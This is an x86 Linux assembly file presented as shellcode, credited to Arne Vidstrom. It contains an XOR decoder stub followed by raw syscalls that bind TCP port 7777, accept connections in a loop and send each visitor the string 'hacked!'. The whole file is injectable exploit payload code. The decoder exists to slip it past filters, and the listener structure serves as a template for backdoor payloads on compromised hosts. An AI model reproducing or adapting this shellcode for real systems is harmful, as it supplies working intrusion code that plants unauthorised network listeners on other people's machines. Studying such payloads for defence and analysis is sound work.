;
; Shellcode that binds to TCP port 7777 and returns the string "hacked!" to those who
; connect to it.
;
; Coded by Arne Vidstrom, http://ntsecurity.nu, http://vidstrom.net
;

	BITS	32

        ; Decode the shellcode

        jmp short first

second:

        pop	eax
        xor	ecx, ecx
        mov	cl, 172

nextone:	

        xor	byte [eax], 022h
        inc	eax
        loop	nextone
        jmp	short after

first:    

        call second

after:

	; Call socket()

	mov	eax, 6
	push	eax
	mov	eax, 1
	push	eax
	mov	eax, 2
	push	eax
	mov	ecx, esp
	mov	ebx, 1
	mov	eax, 0x66
	int	0x80
	mov	esi, eax

	; Call bind()

        xor	eax, eax
        push	eax
        push	eax
        push	eax
        push	dword 0x611e0002
        mov	edx, esp
        mov	eax, 16
        push	eax
        push	edx
	push	esi
	mov	ecx, esp
	mov	ebx, 2
	mov	eax, 0x66
	int	0x80

	; Call listen()

        mov	eax, 5
        push	eax
        push	esi
	mov	ecx, esp
	mov	ebx, 4
	mov	eax, 0x66
        int	0x80

socket_loop:

        ; Call accept()

        sub	esp, 16
        mov	eax, esp
        mov	ebx, 16
        push	ebx
        mov	ebx, esp
        push	ebx
        push	eax
        push	esi
	mov	ecx, esp
	mov	ebx, 5
	mov	eax, 0x66
	int	0x80
	mov	edi, eax

	; Call send()

        push	dword 0x00216465
        push	dword 0x6b636168
        mov	eax, esp
        xor	ebx, ebx
        push	ebx
        mov	ebx, 7
        push	ebx
        push	eax
        push	edi
	mov	ecx, esp
	mov	ebx, 9
	mov	eax, 0x66
        int	0x80

	; Call close()

        mov	ebx, edi
	mov	eax, 0x6
        int	0x80
		        
        jmp	socket_loop